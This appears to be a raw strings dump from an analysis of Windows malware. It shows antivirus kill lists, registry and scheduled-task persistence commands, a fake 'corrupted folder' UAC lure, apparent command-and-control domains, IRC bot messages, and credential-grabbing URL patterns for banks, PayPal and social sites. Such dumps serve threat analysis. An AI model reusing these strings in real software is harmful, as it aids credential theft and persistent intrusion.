%s</pre><pre>http://</pre><pre>iexplore.exe</pre><pre>firefox.exe</pre><pre>tbb-firefox.exe</pre><pre>%s:%hu</pre><pre>windowsupdate</pre><pre>SSH2_MSG_KEXINIT</pre><pre>SSH2_MSG_DISCONNECT</pre><pre>SSH2_MSG_USERAUTH_SUCCESS</pre><pre>http://%s%s/image.php?id=%s</pre><pre>TaskDialogIndirect</pre><pre>http://answers.microsoft.com/en-us/windows/forum/windows_vista-windows_programs/corrupted-documents-folder/e2a7660f-8eea-4f27-b2e6-e77a0f0c1535</pre><pre>ÐxX</pre><pre>ntdll.dll</pre><pre>kernel32.dll</pre><pre>secur32.dll</pre><pre>crypt32.dll</pre><pre>user32.dll</pre><pre>advapi32.dll</pre><pre>wininet.dll</pre><pre>shell32.dll</pre><pre>shlwapi.dll</pre><pre>ole32.dll</pre><pre>version.dll</pre><pre>sfc.dll</pre><pre>dnsapi.dll</pre><pre>ws2_32.dll</pre><pre><requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel></pre><pre><assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="x86" publicKeyToken="6595b64144ccf1df" language="*"></assemblyIdentity></pre><pre>8"808]9|9</pre><pre>9%9 919<9</pre><pre>=(=/=6==={=</pre><pre>4 4?4^4}4</pre><pre>6o6g6r6w6</pre><pre>9 9$9(90949</pre><pre>.text</pre><pre>`.rdata</pre><pre>@.data</pre><pre>.rsrc</pre><pre>This pointer, %d, is aligned on %d</pre><pre>This pointer, %d, is not aligned on %d</pre><pre>%f, %f and %f form a right-angled triangle.</pre><pre>Invalid parameter passed to C runtime function.</pre><pre>?#%X.y</pre><pre>%S#[k</pre><pre>Please contact the application's support team for more information.</pre><pre>- Attempt to initialize the CRT more than once.</pre><pre>- CRT not initialized</pre><pre>- floating point support not loaded</pre><pre>GetProcessWindowStation</pre><pre>USER32.DLL</pre><pre>ShellExecuteA</pre><pre>SHELL32.dll</pre><pre>GetCPInfo</pre><pre>GetWindowsDirectoryA</pre><pre>CreatePipe</pre><pre>GetWindowsDirectoryW</pre><pre>GetConsoleOutputCP</pre><pre>KERNEL32.dll</pre><pre>.VI3xqr</pre><pre>zcÁ</pre><pre>Udp?iw0</pre><pre>/#"%f</pre><pre>P.oUw</pre><pre>B%Su[</pre><pre>Rkka.by</pre><pre>.dYi'</pre><pre>p.Cvq</pre><pre>.EU{%</pre><pre>D<w><pre>;0.Bx</pre><pre>%s)$O</pre><pre>i.zC:*</pre><pre>@7WeB</pre><pre>ld0%F</pre><pre>r. -.kN</pre><pre>.kal"</pre><pre>f.xKK</pre><pre>Software\Classes\CLSID\%S</pre><pre>G:%S_0xX</pre><pre>chrome.exe</pre><pre>opera.exe</pre><pre>safari.exe</pre><pre>maxthon.exe</pre><pre>:Mozilla\Firefox\Profiles</pre><pre>cookies.sqlite</pre><pre>%s\winsxs\x86_microsoft.windows.common-controls_*6.0.*_*</pre><pre>%s\winsxs\%s\comctl32.dll</pre><pre>SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\%s</pre><pre>%s:*:Enabled</pre><pre>avcuf32.dll</pre><pre>SOFTWARE\Microsoft\Windows\CurrentVersion\Run</pre><pre>prstrui.exe</pre><pre>Windows Defender</pre><pre>MpClient.dll</pre><pre>Windows Defender\MSASCui.exe</pre><pre>MpSvc.dll</pre><pre>msseces.exe</pre><pre>MsMpEng.exe</pre><pre>MSASCui.exe</pre><pre>MpAsDesc.dll</pre><pre>MsMpLics.dll</pre><pre>avgui.exe</pre><pre>avgidsagent.exe</pre><pre>avgwdsvc.exe</pre><pre>avgdiagex.exe</pre><pre>avgmfapx.exe</pre><pre>avgupd.exe</pre><pre>avgcfgex.exe</pre><pre>avgnt.exe</pre><pre>avguard.exe</pre><pre>avshadow.exe</pre><pre>avcenter.exe</pre><pre>update.dll</pre><pre>updaterc.dll</pre><pre>usrreq.exe</pre><pre>ccsvchst.exe</pre><pre>symerr.exe</pre><pre>NIS.exe</pre><pre>NAV.exe</pre><pre>navw32.exe</pre><pre>avastui.exe</pre><pre>AvastEmUpdate.exe</pre><pre>ashUpd.exe</pre><pre>WRSA.exe</pre><pre>zatray.exe</pre><pre>ForceField.exe</pre><pre>updating.dll</pre><pre>fshoster32.exe</pre><pre>fsaua.dll</pre><pre>PSUNMain.exe</pre><pre>PSUAService.exe</pre><pre>PSANHost.exe</pre><pre>PSUNScan.dll</pre><pre>epavjobs.exe</pre><pre>AVENGINE.exe</pre><pre>Upgrader.exe</pre><pre>adaware.exe</pre><pre>BullGuard.exe.manifest</pre><pre>BullGuardUpdate.exe</pre><pre>BullGuard.exe</pre><pre>BullGuardScanner.exe</pre><pre>BullGuardBhvScanner.exe</pre><pre>BullGuardUpdate2.exe</pre><pre>BgScan.exe</pre><pre>BgScanEngine.dll</pre><pre>.manifest</pre><pre>updater.exe</pre><pre>Backup\RSD\RSSetup\updater.exe</pre><pre>RsTray.exe</pre><pre>RavMonD.exe</pre><pre>RsMgrSvc.exe</pre><pre>rsmain.exe</pre><pre>RsScan.dll</pre><pre>RsTray.dll</pre><pre>mbamgui.exe</pre><pre>mbam.exe</pre><pre>pctsGui.exe</pre><pre>pctsAuxs.exe</pre><pre>pctsSvc.exe</pre><pre>Update.exe</pre><pre>UpdateHlpr.dll</pre><pre>Definitions\vcore.dll</pre><pre>sbamui.exe</pre><pre>SBAMTray.exe</pre><pre>updater_client_mod.dll</pre><pre>FProtTray.exe</pre><pre>FPWin.exe</pre><pre>scf.dat</pre><pre>ALUpdate.exe</pre><pre>update_tmp.exe</pre><pre>arcaclean.exe</pre><pre>BavUpdater.exe</pre><pre>rcfp.exe</pre><pre>CLPSLA.exe</pre><pre>op_mon.exe</pre><pre>niu.exe</pre><pre>K7TSUpdT.exe</pre><pre>sguardxup.exe</pre><pre>ccupdate.exe</pre><pre>caupdate.dll</pre><pre>a2guard.exe</pre><pre>a2start.exe</pre><pre>a2service.exe</pre><pre>AVKTray.exe</pre><pre>GDSC.exe</pre><pre>AVK.exe</pre><pre>GDFirewallTray.exe</pre><pre>Bka.exe</pre><pre>BLuPro.exe</pre><pre>BkavSystemServer.exe</pre><pre>BkavService.exe</pre><pre>LiveUpdate.dll</pre><pre>LiveConnect.dll</pre><pre>BaseFile\Bkav\LiveUpdate.dll</pre><pre>V3Lite.exe</pre><pre>ASDSvc.exe</pre><pre>autoup.exe</pre><pre>downloader.exe</pre><pre>%s.config</pre><pre>updatesrv.exe</pre><pre>updatemgr.dll</pre><pre>egui.exe</pre><pre>ekrn.exe</pre><pre>x86\ekrn.exe</pre><pre>uWinMgr.exe</pre><pre>coreServiceShell.exe</pre><pre>uiSeAgnt.exe</pre><pre>uiWatchDog.exe</pre><pre>plugins\plugUpdater.dll</pre><pre>UiFrmwrk\uiUpdateTray.exe</pre><pre>coreFrameworkHost.exe</pre><pre>mcagent.exe</pre><pre>McSvHost.exe</pre><pre>McUICnt.exe</pre><pre>McPvTray.exe</pre><pre>mcui_exe</pre><pre>mcpltui_exe</pre><pre>mcshell.exe</pre><pre>mcupdmgr.exe</pre><pre>mcupdate.exe</pre><pre>mcshield.exe</pre><pre>mcupdui.dll</pre><pre>McAPExe.exe</pre><pre>.config</pre><pre>Image File Execution Options\%s</pre><pre>SYSTEM\CurrentControlSet\services\%s</pre><pre>%c:\ntusbdriver.sys</pre><pre>%c:\*p.exe</pre><pre>%c:\%s</pre><pre>p.exe</pre><pre>%WinDir%\explorer.exe</pre><pre>/C start /d. %s&"%s"</pre><pre>%COMSPEC%</pre><pre>%WinDir%\system32\shell32.dll</pre><pre>%c:\%s.lnk</pre><pre>VisthAux.exe</pre><pre>explorer.exe</pre><pre>t.minecraft</pre><pre>Works! PID: %d, Name: %s</pre><pre>cmdvirth</pre><pre>%s%s\X</pre><pre>tcp://</pre><pre>svchost.exe</pre><pre>csrss.exe</pre><pre>lsass.exe</pre><pre>smss.exe</pre><pre>wscript.exe</pre><pre>cscript.exe</pre><pre>vbc.exe</pre><pre>rundll32.exe</pre><pre>regsvr32.exe</pre><pre>SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run</pre><pre>winlogon.exe</pre><pre>services.exe</pre><pre>%s\x.lnk</pre><pre>SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\%s</pre><pre>desktop.ini</pre><pre>SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce</pre><pre>SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows</pre><pre>wintrust.dll</pre><pre>chrome.dll</pre><pre>Applications\iexplore.exe\shell\open\command</pre><pre>%s_xx</pre><pre>x.zip</pre><pre>Navw32.exe</pre><pre>SysInspector.exe</pre><pre>avscan.exe</pre><pre>mfefire.exe</pre><pre>wuauclt.exe</pre><pre>WerFault.exe</pre><pre>lFileZilla\sitemanager.xml</pre><pre>port</pre><pre>Sites.dat</pre><pre>Quick.dat</pre><pre>%s\3\%s</pre><pre>%s\4\%s</pre><pre>spoolsv.exe</pre><pre>steam.exe</pre><pre>skype.exe</pre><pre>origin.exe</pre><pre>dwm.exe</pre><pre>tapi3.dll</pre><pre>/C copy "%s" "%s"</pre><pre>SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run</pre><pre>Windows Update Service</pre><pre>"%s" /%s</pre><pre>Software\Microsoft\Windows\CurrentVersion\RunOnce</pre><pre>/CREATE /SC ONLOGON /TN "Windows Update Check - 0xX" /TR "%s" /RL HIGHEST</pre><pre>schtasks.exe</pre><pre>/DELETE /TN "Windows Update Check - 0xX" /F</pre><pre>\Windows\Explorer.exe</pre><pre>Low_X</pre><pre>%s.manifest</pre><pre>PendingFileRenameOperations</pre><pre>%s\X</pre><pre>Windows\CurrentVersion\Run</pre><pre>CurrentVersion\Windows</pre><pre>Windows NT\CurrentVersion\Image File Execution Options\%s</pre><pre>Windows has encountered a corrupted folder on your hard drive</pre><pre>Multiple corrupted files have been found in the folder 'My Documents'. To prevent serious loss of data, please allow Windows to restore these files.</pre><pre>Corrupted folder: %s</pre><pre>Corrupted file count: %d</pre><pre><a href=".ms">%s</a></pre><pre>/c start "" "%s" /%s "%s"</pre><pre>shell32,ShellExec_RunDLL "%s" /%s "%s"</pre><pre>You denied the proper privileges to the Windows file restoration utility. Please select YES on the following UAC prompt to allow Windows to restore the corrupted files.</pre><pre>Windows 3.1 Update Service</pre><pre>%s:Zone.Identifier</pre><pre>%s\X.pif</pre><pre>KERNEL32.DLL</pre><pre>KERNELBASE.DLL</pre><pre>kernelbase.dll</pre><pre>oSome operation could not be performed because the system is out of resources. Close some windows and try again.</pre><pre>Setting bit transparency color is not allowed for png images containing alpha value for each pixel (COLOR_RGBALPHA and COLOR_GRAYSCALEALPHA)OThis operation is not valid because the current image contains no valid header.4The new size provided for image resizing is invalid.oThe "Portable Network Graphics" could not be created because invalid image type parameters have being provided.2Software\Microsoft\Windows\CurrentVersion\Explorer</pre><pre>UThis "Portable Network Graphics" image is invalid because it has missing image parts.[Could not decompress the image because it contains invalid compressed data.</pre><pre>Description: BThe "Portable Network Graphics" image contains an invalid palette.</pre><pre>The file being read is not a valid "Portable Network Graphics" image because it contains an invalid header. This file may be corrupted, try obtaining it againnThis "Portable Network Graphics" image is not supported or it might be invalid.</pre><pre>This "Portable Network Graphics" image is not supported because either its width or height exceeds the maximum size of 65535 pixels.</pre><pre>There is no such palette entry.dThis "Portable Network Graphics" image contains an unknown critical part which could not be decoded.pThis "Portable Network Graphics" image is encoded with an unknown compression scheme which could not be decoded.cThis "Portable Network Graphics" image uses an unknown interlace scheme which could not be decoded.-The chunks must be compatible to be assigned.jThis "Portable Network Graphics" image is invalid because the decoder found an unexpected end of the file.8This "Portable Network Graphics" image contains no data.]The program tried to add a existent critical chunk to the current image which is not allowed.IIt's not allowed to add a new chunk because the current image is invalid.7The png image could not be loaded from the resource ID.)Class '%s' is already registered for '%s'%Class '%s' is not registered for '%s'</pre><pre>%s parameter cannot be nil#Feature not supported by this style</pre><pre>Style '%s' is not registered"Cannot unregister the system style</pre><pre>OLE error %.8x.Method '%s' not supported by automation object/Variant does not reference an automation object7Dispatch methods do not support more than 64 parameters</pre><pre>Failed to Save StreamjThis "Portable Network Graphics" image is not valid because it contains invalid pieces of data (crc error)yThe "Portable Network Graphics" image could not be loaded because one of its main piece of data (ihdr) might be corrupted</pre><pre>Login</pre><pre>"%s" is an invalid pathÊnnot remove shell notification icon"%s requires Windows Vista or later</pre><pre>Button%d</pre><pre>RadioButton%d</pre><pre>Unable to load style '%s'</pre><pre>Unable to load styles: %s</pre><pre>Style '%s' already registered#Style class '%s' already registered</pre><pre>Style '%s' not found</pre><pre>Style class '%s' not found</pre><pre>All Clipboard does not support Icons</pre><pre>Cannot open clipboard: %s</pre><pre>Text exceeds memo capacity Operation not supported on selected printer.There is no default printer currently selected/Menu '%s' is already being used by another form</pre><pre>- Dock zone has no controlLError loading dock zone from the stream. Expecting version %d, but found %d.7Length of value array must be >= length of prompt array</pre><pre>&Password</pre><pre>Value must be between %d and %d</pre><pre>%s on %s@GroupIndex cannot be less than a previous menu item's GroupIndex5Cannot create form. No MDI forms are currently active0Can only modify an image if it contains a bitmap*A control cannot have itself as its parent</pre><pre>Error creating window class Cannot focus a disabled or invisible window!Control '%s' has no parent window$Parent given is not a parent of '%s'</pre><pre>%s property out of rangeGNo single cast observer with ID %d was added to the observer collectionFNo multi cast observer with ID %d was added to the observer collection</pre><pre>Scan line index out of range!Cannot change the size of an iconÊnnot change the size of a WIC Image$Unknown picture file extension (.%s)</pre><pre>Unsupported clipboard format</pre><pre>Canvas does not allow drawing#Text format flag '%s' not supported</pre><pre>Windows Server 2003</pre><pre>Windows Server 2003 R2</pre><pre>Windows Server 2012</pre><pre>Windows 8</pre><pre>Error writing zip file"Invalid Zip Local Header signature$Invalid Zip Central Header signature1Support for compression method not registered: %s</pre><pre>Observer is not supportedLCannot have multiple single cast observers added to the observers collection4The object does not implement the observer interface5Insufficient RTTI available to support this operation</pre><pre>Parameter count mismatch<Type><pre>Windows</pre><pre>Windows Vista</pre><pre>Windows Server 2008</pre><pre>Windows 7</pre><pre>Windows Server 2008 R2</pre><pre>Windows 2000</pre><pre>Windows XP</pre><pre>Timespan too longbThe duration cannot be returned because the absolute value exceeds the value of TTimeSpan.MaxValue</pre><pre>No help found for context %d</pre><pre>No help found for %s</pre><pre>Parameter %s cannot be nil'Parameter %s cannot be a negative value*Input buffer exceeded for %s = %d, %s = %d</pre><pre>The specified path is too long The specified path was not found The path format is not supported</pre><pre>The drive cannot be found The specified file was not foundWThe given "%s" local time is invalid (situated within the missing period prior to DST).$No help viewer that supports filters</pre><pre>Invalid Timeout value: %s</pre><pre>Failed to create key %s</pre><pre>Failed to get data for '%s'</pre><pre>Failed to set data for '%s'</pre><pre>Resource %s not found</pre><pre>%s.Seek not implemented$Operation not allowed on sorted list$%s not in a class registration group</pre><pre>Property %s does not exist</pre><pre>Thread creation error: %s</pre><pre>Thread Error: %s (%d)-Cannot terminate an externally created thread,Cannot wait for an externally created thread2Cannot call Start on a running or suspended thread;Cannot call CheckTerminated on an externally created thread</pre><pre>Unable to write to %s</pre><pre>Invalid file name - %s</pre><pre>'%s' is an invalid mask at (%d)$''%s'' is not a valid component name</pre><pre>Invalid data type for '%s' List capacity out of bounds (%d)</pre><pre>List count out of bounds (%d)</pre><pre>List index out of bounds (%d) Out of memory while expanding memory stream)%s has not been registered as a COM class</pre><pre>Error reading %s%s%s: %s</pre><pre>Invalid count (%d)</pre><pre>Invalid destination index (%d)</pre><pre>Ancestor for '%s' not found</pre><pre>Cannot assign a %s to a %s</pre><pre>Bits index out of range*Can't write to a read-only resource streamECheckSynchronize called from thread $%x, which is NOT the main thread</pre><pre>Class %s not found</pre><pre>A class named %s already exists%List does not allow duplicates ($0%x)#A component named %s already exists%String list does not allow duplicates</pre><pre>Cannot create file "%s". %s</pre><pre>Cannot open file "%s". %s</pre><pre>Invalid destination array"Character index out of bounds (%d)</pre><pre>Start index out of bounds (%d)</pre><pre>%s (%s, line %d)</pre><pre>Abstract Error?Access violation at address %p in module '%s'. %s of address %p</pre><pre>System Error. Code: %d.</pre><pre>2Too many custom variant types have been registered5Could not convert variant of type (%s) into type (%s)=Overflow while converting variant of type (%s) into type (%s)</pre><pre>Operation not supported</pre><pre>External exception %x</pre><pre>Interface not supported</pre><pre>Object lock not owned(Monitor support function not initialized</pre><pre>Application Error1Format '%s' invalid or incompatible with argument</pre><pre>No argument for format '%s'"Variant method calls not supported</pre><pre>Invalid variant operation</pre><pre>Invalid NULL variant operation%Invalid variant operation (%s%.8x)</pre><pre>%s,Custom variant type (%s%.4x) is out of range/Custom variant type (%s%.4x) already used by %s*Custom variant type (%s%.4x) is not usable</pre><pre>Integer overflow Invalid floating point operation</pre><pre>Invalid pointer operation</pre><pre>Invalid class typecast0Access violation at address %p. %s of address %p</pre><pre>Privileged instruction(Exception %s in module %s at %p.</pre><pre><unknown>!'%s' is not a valid integer value('%s' is not a valid floating point value</unknown></pre><pre>'%s' is not a valid date</pre><pre>'%s' is not a valid time!'%s' is not a valid date and time '%d.%d' is not a valid timestamp</pre><pre>'%s' is not a valid GUID value</pre><pre>I/O error %d</pre>notepad.exe_1520_rwx_000A0000_00029000:<pre>.text</pre><pre>`.data</pre><pre>.rsrc</pre><pre>@.reloc</pre><pre>*windows defender*</pre><pre>*windowsupdate*</pre><pre>*drweb*</pre><pre>dwwin.exe</pre><pre>kernel32.dll</pre><pre>iphlpapi.dll</pre><pre>GetExtendedTcpTable</pre><pre>GetOwnerModuleFromTcpEntry</pre><pre>%systemroot%</pre><pre>%programfiles%\Common Files\*\*.exe</pre><pre>%appdata%\Identities\*.exe</pre><pre>%root%\RECYCLER\S-1-5-21-0243556031-888888379-*\*.exe</pre><pre>ole32.dll</pre><pre>/c "%%SystemRoot%%\explorer.exe %Í%%%s & attrib -s -h %Í%%%s & xcopy /F /S /Q /H /R /Y %Í%%%s %%temp%%\%s\ & attrib s h %Í%%%s & start %%temp%%\%s\%s & exit"</pre><pre>/c "start %Í%%%s & attrib -s -h %Í%%%s & xcopy /F /S /Q /H /R /Y %Í%%%s %%temp%%\%s\ & attrib s h %Í%%%s & start %%temp%%\%s\%s & exit"</pre><pre>%ALLUSERSPROFILE%\..\..\windows\system32\cmd.exe</pre><pre>%SystemRoot%\system32\SHELL32.dll</pre><pre>%s\c731200</pre><pre>%s\%s</pre><pre>%s\%s.lnk</pre><pre>Windows_Shared_Mutex_231_c000100</pre><pre>ntdll.dll</pre><pre>\ScreenSaverPro.scr</pre><pre>\temp.bin</pre><pre>user32.dll</pre><pre>advapi32.dll</pre><pre>shell32.dll</pre><pre>urlmon.dll</pre><pre>wininet.dll</pre><pre>gdi32.dll</pre><pre>rpcrt4.dll</pre><pre>netapi32.dll</pre><pre>*.exe</pre><pre>.gonewiththewings</pre><pre>*.gonewiththewings</pre><pre>WinExec</pre><pre>URLDownloadToFileA</pre><pre>http://www.google.com</pre><pre>\calc.exe</pre><pre>\Reader_sl.exe</pre><pre>SOFTWARE\Microsoft\Windows\CurrentVersion\Run</pre><pre>notepad.exe</pre><pre>\notepad.exe</pre><pre>\svchost.exe</pre><pre>WindowsId</pre><pre>Identities\%s</pre><pre>%s\%s\%s.exe</pre><pre>:Zone.Identifier</pre><pre>.quarantined</pre><pre>"%s" -shell</pre><pre>"%s" -bind</pre><pre>userinit.exe</pre><pre>explorer.exe</pre><pre>Windows critical error, require reboot</pre><pre>Windows Update</pre><pre>SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System</pre><pre>a.aiphon1egalaxyblack42.com</pre><pre>a.ajjjqws1fkxx42.com</pre><pre>a.adoyou1understandme42.com</pre><pre>a.amous1epadsafa42.com</pre><pre>a.acaraka1lagroup42.com</pre><pre>a.aire1bobohayawen42.com</pre><pre>a.ajhvdqw1ladies42.com</pre><pre>a.biphon2egalaxyblack42.com</pre><pre>a.bmous2epadsafa42.com</pre><pre>a.bcaraka2lagroup42.com</pre><pre>a.anabok1hasn1aser42.com</pre><pre>a.athemall1gonowhaha42.com</pre><pre>a.bdoyou2understandme42.com</pre><pre>a.bnabok2hasn1aser42.com</pre><pre>a.bjjjqws2fkxx42.com</pre><pre>a.bjhvdqw2ladies42.com</pre><pre>a.bthemall2gonowhaha42.com</pre><pre>a.bire2bobohayawen42.com</pre><pre>a.cdoyou3understandme42.com</pre><pre>a.cmous3epadsafa42.com</pre><pre>a.dmous4epadsafa42.com</pre><pre>a.ciphon3egalaxyblack42.com</pre><pre>a.cnabok3hasn1aser42.com</pre><pre>a.cire3bobohayawen42.com</pre><pre>a.cthemall3gonowhaha42.com</pre><pre>a.cjhvdqw3ladies42.com</pre><pre>a.cjjjqws3fkxx42.com</pre><pre>a.ccaraka3lagroup42.com</pre><pre>a.diphon4egalaxyblack42.com</pre><pre>a.ddoyou4understandme42.com</pre><pre>a.dnabok4hasn1aser42.com</pre><pre>a.dire4bobohayawen42.com</pre><pre>a.djjjqws4fkxx42.com</pre><pre>a.djhvdqw4ladies42.com</pre><pre>a.dthemall4gonowhaha42.com</pre><pre>a.edoyou5understandme42.com</pre><pre>a.dcaraka4lagroup42.com</pre><pre>a.emous5epadsafa42.com</pre><pre>a.ecaraka5lagroup42.com</pre><pre>a.eiphon5egalaxyblack42.com</pre><pre>a.enabok5hasn1aser42.com</pre><pre>a.eire5bobohayawen42.com</pre><pre>a.ejjjqws5fkxx42.com</pre><pre>a.ejhvdqw5ladies42.com</pre><pre>a.ethemall5gonowhaha42.com</pre><pre>a.roooggeyyy2.com</pre><pre>a.roooggeyyy3.com</pre><pre>a.roooggeyyy4.com</pre><pre>a.so1aa00.com</pre><pre>a.saao20000.com</pre><pre>GetProcessHeap</pre><pre>GetWindowsDirectoryA</pre><pre>KERNEL32.dll</pre><pre>USER32.dll</pre><pre>RegCloseKey</pre><pre>RegOpenKeyA</pre><pre>RegEnumKeyA</pre><pre>RegCreateKeyExA</pre><pre>RegOpenKeyExA</pre><pre>ADVAPI32.dll</pre><pre>ShellExecuteExW</pre><pre>SHELL32.dll</pre><pre>SetTcpEntry</pre><pre>SHLWAPI.dll</pre><pre>RPCRT4.dll</pre><pre>NETAPI32.dll</pre><pre>DNSAPI.dll</pre><pre>Software\Microsoft\Windows NT\CurrentVersion\Winlogon</pre><pre>Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run</pre><pre>Software\WindowsId Manager Reader</pre><pre>Software\Microsoft\Windows\CurrentVersion\Policies\Explorer</pre><pre>Software\Microsoft\Windows\CurrentVersion\Run</pre><pre>Software\Microsoft\Windows\CurrentVersion\RunOnce</pre><pre>WindowsMark</pre><pre>m1xg.org</pre><pre>mxxtxxt.biz</pre><pre>meob.me</pre><pre>%System%\notepad.exe</pre><pre>`.rdata</pre><pre>@.data</pre><pre>.reloc</pre><pre>=MSG t</pre><pre>>MSG u`</pre><pre>=PASS</pre><pre>8httpu1</pre><pre>8httpuM</pre><pre>tlSSSSSSSSSShL0A</pre><pre>%s.%s</pre><pre>%s.%S</pre><pre>%s.Blocked "%s" from removing our bot file!</pre><pre>%s.Blocked "%S" from removing our bot file!</pre><pre>i.root-servers.org</pre><pre>%s.Blocked "%s" from moving our bot file</pre><pre>%s.Blocked "%S" from moving our bot file</pre><pre>%s.p10-> Message hijacked!</pre><pre>%s.p10-> Message to %s hijacked!</pre><pre>%s.p21-> Message hijacked!</pre><pre>msnmsg</pre><pre>CAL %d %6s</pre><pre>ngr->blocksize: %d</pre><pre>block_size: %d</pre><pre>\\.\pipe\%s</pre><pre>%s_%d</pre><pre>-%sMutex</pre><pre>%s-pid</pre><pre>%s-comm</pre><pre>JOIN #</pre><pre>PRIVMSG #</pre><pre>%s.Blocked "%S" from creating "%S"</pre><pre>%s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!</pre><pre>%s.Detected process "%S" sending an IRC packet to server %s:%d.</pre><pre>%s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).</pre><pre>PRIVMSG %5s</pre><pre>JOIN %5s</pre><pre>PRIVMSG</pre><pre>JOIN</pre><pre>%s:%d</pre><pre>%s.%s%s</pre><pre>%S%s%s</pre><pre>%s.%S%S</pre><pre>%S%S%S</pre><pre>state_%s</pre><pre>%s.%s (p='%S')</pre><pre>pop3://%s:%s@%s:%d</pre><pre>%s:%s@%s:%d</pre><pre>ftp://%s:%s@%s:%d</pre><pre>ftpgrab</pre><pre>%s.%s ->> %s (%s : %s)</pre><pre>%s.%s ->> %s : %s</pre><pre>%s-%s-%s</pre><pre>%s.Blocked possible browser exploit pack call on URL '%s'</pre><pre>%s.Blocked possible browser exploit pack call on URL '%S'</pre><pre>webroot.</pre><pre>virusbuster.nprotect.</pre><pre>heck.tc</pre><pre>onecare.live.</pre><pre>login[password]</pre><pre>login[username]</pre><pre>*members*.iknowthatgirl*/members*</pre><pre>*youporn.*/login*</pre><pre>*members.brazzers.com*</pre><pre>*bcointernacional*login*</pre><pre>*:2222/CMD_LOGIN*</pre><pre>*whcms*dologin*</pre><pre>*:2086/login*</pre><pre>*:2083/login*</pre><pre>*:2082/login*</pre><pre>*webnames.ru/*user_login*</pre><pre>Webnames</pre><pre>*dotster.com/*login*</pre><pre>loginid</pre><pre>*enom.com/login*</pre><pre>login.Pass</pre><pre>login.User</pre><pre>*login.Pass=*</pre><pre>*1and1.com/xml/config*</pre><pre>*moniker.com/*Login*</pre><pre>LoginPassword</pre><pre>LoginUserName</pre><pre>*LoginPassword=*</pre><pre>*namecheap.com/*login*</pre><pre>loginname</pre><pre>*godaddy.com/login*</pre><pre>Password</pre><pre>*Password=*</pre><pre>*alertpay.com/login*</pre><pre>*netflix.com/*ogin*</pre><pre>*thepiratebay.org/login*</pre><pre>*torrentleech.org/*login*</pre><pre>*vip-file.com/*/signin-do*</pre><pre>*sms4file.com/*/signin-do*</pre><pre>*letitbit.net*</pre><pre>*what.cd/login*</pre><pre>*oron.com/login*</pre><pre>*filesonic.com/*login*</pre><pre>*speedyshare.com/login*</pre><pre>*uploaded.to/*login*</pre><pre>*uploading.com/*login*</pre><pre>loginUserPassword</pre><pre>loginUserName</pre><pre>*loginUserPassword=*</pre><pre>*fileserv.com/login*</pre><pre>*hotfile.com/login*</pre><pre>*4shared.com/login*</pre><pre>txtpass</pre><pre>*txtpass=*</pre><pre>*netload.in/index*</pre><pre>*freakshare.com/login*</pre><pre>login_pass</pre><pre>*login_pass=*</pre><pre>*mediafire.com/*login*</pre><pre>*sendspace.com/login*</pre><pre>*megaupload.*/*login*</pre><pre>*depositfiles.*/*/login*</pre><pre>*signin.ebay*SignIn</pre><pre>*officebanking.cl/*login.asp*</pre><pre>*secure.logmein.*/*logincheck*</pre><pre>session[password]</pre><pre>*password]=*</pre><pre>*twitter.com/sessions</pre><pre>txtPassword</pre><pre>*&txtPassword=*</pre><pre>*.moneybookers.*/*login.pl</pre><pre>*runescape*/*weblogin*</pre><pre>*&password=*</pre><pre>*no-ip*/login*</pre><pre>*steampowered*/login*</pre><pre>quick_password</pre><pre>*hackforums.*/member.php</pre><pre>*facebook.*/login.php*</pre><pre>*login.yahoo.*/*login*</pre><pre>passwd</pre><pre>login</pre><pre>*passwd=*</pre><pre>*login.live.*/*post.srf*</pre><pre>TextfieldPassword</pre><pre>*TextfieldPassword=*</pre><pre>*gmx.*/*FormLogin*</pre><pre>*Passwd=*</pre><pre>FLN-Password</pre><pre>*FLN-Password=*</pre><pre>*pass=*</pre><pre>*bigstring.*/*index.php*</pre><pre>*screenname.aol.*/login.psp*</pre><pre>password</pre><pre>loginId</pre><pre>*password=*</pre><pre>*aol.*/*login.psp*</pre><pre>Passwd</pre><pre>*google.*/*ServiceLoginAuth*</pre><pre>login_password</pre><pre>login_email</pre><pre>*login_password=*</pre><pre>*paypal.*/webscr?cmd=_login-submit*</pre><pre>%s / ?%d HTTP/1.1</pre><pre>Host: %s</pre><pre>User-Agent: %s</pre><pre>Mozilla/4.0</pre><pre>\\.\PHYSICALDRIVE0</pre><pre>httpi</pre><pre>dnsapi.dll</pre><pre>http://%s/%s</pre><pre>http://%s/</pre><pre>POST /23s</pre><pre>[%s{%s%s{%s</pre><pre>n%s[%s{%s%s{%s</pre><pre>%s[%s{%s</pre><pre>[DNS]: Redirecting "%s" to "%s"</pre><pre>%s|%s</pre><pre>[Logins]: Cleared %d logins</pre><pre>FTP -></pre><pre>[d="%s" s="%d bytes"] Download error: MD5 mismatch (%s != %s)</pre><pre>http://</pre><pre>[Login]: %s</pre><pre>[DNS]: Blocked %d domain(s) - Redirected %d domain(s)</pre><pre>[Speed]: Estimated upload speed %d KB/s</pre><pre>\\.\%c:</pre><pre>*bebo.*/c/profile/comment_post.json</pre><pre>*bebo.*/mail/MailCompose.jsp*</pre><pre>*friendster.*/sendmessage.php*</pre><pre>*friendster.*/rpc.php</pre><pre>*vkontakte.ru/mail.php</pre><pre>*vkontakte.ru/wall.php</pre><pre>*vkontakte.ru/api.php</pre><pre>*facebook.*/ajax/*MessageComposerEndpoint.php*</pre><pre>msg_text</pre><pre>*facebook.*/ajax/chat/send.php*</pre><pre>-_.!~*'()</pre><pre>%s.%s hijacked!</pre><pre>MSG %d %s %d</pre><pre>MSG %d %1s</pre><pre>SDG %d %d</pre><pre>Content-Length: %d</pre><pre>SDG 